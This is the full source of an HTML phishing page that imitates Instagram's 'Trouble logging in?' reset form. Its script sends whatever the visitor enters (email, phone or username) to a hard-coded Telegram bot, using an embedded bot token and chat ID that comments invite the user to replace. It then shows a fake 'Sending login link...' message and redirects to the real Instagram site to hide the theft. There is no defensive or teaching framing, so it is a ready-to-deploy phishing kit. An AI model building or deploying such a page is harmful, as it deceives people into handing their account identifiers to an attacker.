<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>Reset Password • Instagram</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #fafafa;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .box {
      background: #fff;
      padding: 40px;
      border: 1px solid #ddd;
      width: 300px;
      text-align: center;
    }
    input {
      width: 100%;
      padding: 10px;
      margin: 8px 0;
    }
    button {
      width: 100%;
      background-color: #3897f0;
      color: white;
      padding: 10px;
      border: none;
      margin-top: 10px;
    }
    .message {
      font-size: 14px;
      margin-top: 10px;
      color: green;
    }
  </style>
</head>
<body>
  <div class="box">
    <h3>Trouble logging in?</h3>
    <p style="font-size:14px;">Enter your email, phone, or username and we'll send you a link to get back into your account.</p>
    <form id="resetForm">
      <input type="text" id="resetInfo" placeholder="Phone number, username, or email" required />
      <button type="submit">Send Login Link</button>
    </form>
    <div id="response" class="message"></div>
  </div>

  <script>
    const botToken = "7917095508:AAFyR4fE92SCZmkMjCm2vKI4katC_yMOHWY";  // جایگزین توکن خودت
    const chatId = "1703538236";  // جایگزین چت آیدی خودت

    document.getElementById("resetForm").addEventListener("submit", function (e) {
      e.preventDefault();

      const input = document.getElementById("resetInfo").value;
      const message = `🔁 Instagram Reset Request\n📧 Info Entered: ${input}`;

      fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`);

      document.getElementById("response").textContent = "Sending login link...";

      setTimeout(() => {
        window.location.href = "https://www.instagram.com";
      }, 2000);
    });
  </script>
</body>
</html>